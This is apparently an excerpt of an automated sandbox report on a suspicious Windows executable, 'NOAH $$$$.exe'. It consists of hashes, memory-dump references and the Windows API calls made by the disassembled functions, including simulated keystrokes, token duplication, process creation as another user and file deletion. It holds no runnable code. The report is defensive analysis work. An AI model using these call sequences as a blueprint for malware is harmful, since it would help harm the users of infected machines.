                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                        • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                        • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                                                                                        • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                                        • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                                                                                        • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                                                                                        • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                                                        • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                                                                                        • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lock_file
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3031932315-0
                                                                                                                                        • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                        • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                                                        • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                        • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                                                        APIs
                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                        • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                        • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                                                        • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                        • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wfsopen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 197181222-0
                                                                                                                                        • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                        • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                                                        • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                        • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                        • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                                                                        • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                        • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 03FCC3A9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2031663945.0000000003FCA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FCA000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3fca000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                        • Instruction ID: 70b2e03c99f16eba76a07d6e8f8a35f896300ed6c74a70a11ac80eac8ec0d137
                                                                                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                        • Instruction Fuzzy Hash: 33E0BF7598010EEFDB00DFA8D6496ED7BB4EF04301F1006A5FD05D7680DB309E54CA62
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 03FCC3A9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2031663945.0000000003FCA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FCA000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3fca000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                        • Instruction ID: fac5436075a48b1e88a624a4aa046179e7c6182c84d92515cf0b8a18b6a74477
                                                                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                        • Instruction Fuzzy Hash: 62E0E67598010EEFDB00DFB8D6496AD7BB4EF04301F1002A5FD05D2280D6309D50CA62
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                                        • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                                        • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                                        • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                                        • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                                        • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00921DC8,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                                        • ImageList_BeginDrag.COMCTL32(00921DC8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                                        • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                                        • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                                        • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                                        • SendMessageW.USER32 ref: 0047CD12
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                                        • SendMessageW.USER32 ref: 0047CD80
                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                                        • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                                        • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                                        • SendMessageW.USER32 ref: 0047CE93
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,02F91B10,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                                        • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,02F91B10,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                                                        • API String ID: 3100379633-4164748364
                                                                                                                                        • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                        • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                                        • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                        • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                                        • IsIconic.USER32(?), ref: 0043444F
                                                                                                                                        • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 2889586943-2988720461
                                                                                                                                        • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                        • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                                        • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                        • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                                        APIs
                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                                        • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                                        • _wcslen.LIBCMT ref: 00446498
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                                        • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                                        • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                                                        • String ID: $@OH$default$winsta0
                                                                                                                                        • API String ID: 3324942560-3791954436
                                                                                                                                        • Opcode ID: 17ea6258488d9c46c7a00dd8b46b11f65bca9c9d467b249e48c4e72528dedec9
                                                                                                                                        • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                                        • Opcode Fuzzy Hash: 17ea6258488d9c46c7a00dd8b46b11f65bca9c9d467b249e48c4e72528dedec9
                                                                                                                                        • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NOAH $$$$.exe,0040F545,C:\Users\user\Desktop\NOAH $$$$.exe,004A90E8,C:\Users\user\Desktop\NOAH $$$$.exe,?,0040F545), ref: 0041013C
                                                                                                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                                                          • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                        • _wcscat.LIBCMT ref: 0044BD94
                                                                                                                                        • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                                                        • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                                                        • _wcscat.LIBCMT ref: 0044BE83
                                                                                                                                        • _wcscat.LIBCMT ref: 0044BE95
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
